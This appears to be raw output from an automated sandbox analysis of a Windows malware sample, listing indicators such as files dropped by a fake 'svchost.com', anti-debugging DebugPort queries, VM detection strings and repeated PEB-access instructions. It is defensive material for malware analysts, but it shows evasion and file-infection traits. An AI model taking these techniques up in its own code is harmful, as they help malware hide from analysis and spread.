          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXEJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exeJump to dropped file
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXEJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exeJump to dropped file
          Source: C:\Windows\svchost.comDropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXEJump to dropped file
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe TID: 4404 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_00405080 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_00405634 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_00404F6C FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040F13F FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_004056A7 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040EA04 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040EB16 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 2_2_00405CD8 FindFirstFileA,FindClose
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 2_2_0040263E FindFirstFileA
          Source: C:\Windows\svchost.com Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_00404F6C FindFirstFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040F13F FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040EA04 FindFirstFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040EB16 FindFirstFileA,FindClose
          Source: C:\Windows\svchost.com Code function: 5_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe Code function: 1_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Thread delayed: delay time: 30000
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\11357\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\
          Source: C:\Users\user\Desktop\vi0EwpbUht.exe File opened: C:\Documents and Settings\All Users\Application Data\Application Data\
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.360481969.00000000063F6000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.442375787.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.368886619.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.337120885.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000004.00000000.414458333.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00409A80 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_0040ACC0 LdrLoadDll
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 2_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009EB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009EA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A849A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009E99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009E99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_009C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe Code function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF mov eax, dword ptr fs:[00000030h]3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2ACB mov eax, dword ptr fs:[00000030h]3_2_009F2ACB
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2AE4 mov eax, dword ptr fs:[00000030h]3_2_009F2AE4
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E3A1C mov eax, dword ptr fs:[00000030h]3_2_009E3A1C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]3_2_009CAA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CAA16 mov eax, dword ptr fs:[00000030h]3_2_009CAA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]3_2_00A04A2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A04A2C mov eax, dword ptr fs:[00000030h]3_2_00A04A2C
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov ecx, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C5210 mov eax, dword ptr fs:[00000030h]3_2_009C5210
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D8A0A mov eax, dword ptr fs:[00000030h]3_2_009D8A0A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236 mov eax, dword ptr fs:[00000030h]3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA229 mov eax, dword ptr fs:[00000030h]3_2_009EA229
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]3_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8AA16 mov eax, dword ptr fs:[00000030h]3_2_00A8AA16
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]3_2_00A7B260
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7B260 mov eax, dword ptr fs:[00000030h]3_2_00A7B260
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A98A62 mov eax, dword ptr fs:[00000030h]3_2_00A98A62
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0927A mov eax, dword ptr fs:[00000030h]3_2_00A0927A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C9240 mov eax, dword ptr fs:[00000030h]3_2_009C9240
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A54257 mov eax, dword ptr fs:[00000030h]3_2_00A54257
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8EA55 mov eax, dword ptr fs:[00000030h]3_2_00A8EA55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2397 mov eax, dword ptr fs:[00000030h]3_2_009F2397
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A95BA5 mov eax, dword ptr fs:[00000030h]3_2_00A95BA5
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FB390 mov eax, dword ptr fs:[00000030h]3_2_009FB390
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]3_2_009D1B8F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D1B8F mov eax, dword ptr fs:[00000030h]3_2_009D1B8F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B mov eax, dword ptr fs:[00000030h]3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8138A mov eax, dword ptr fs:[00000030h]3_2_00A8138A
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7D380 mov ecx, dword ptr fs:[00000030h]3_2_00A7D380
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F4BAD mov eax, dword ptr fs:[00000030h]3_2_009F4BAD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov ecx, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3 mov eax, dword ptr fs:[00000030h]3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]3_2_00A453CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A453CA mov eax, dword ptr fs:[00000030h]3_2_00A453CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EDBE9 mov eax, dword ptr fs:[00000030h]3_2_009EDBE9
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F03E2 mov eax, dword ptr fs:[00000030h]3_2_009F03E2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309 mov eax, dword ptr fs:[00000030h]3_2_009EA309
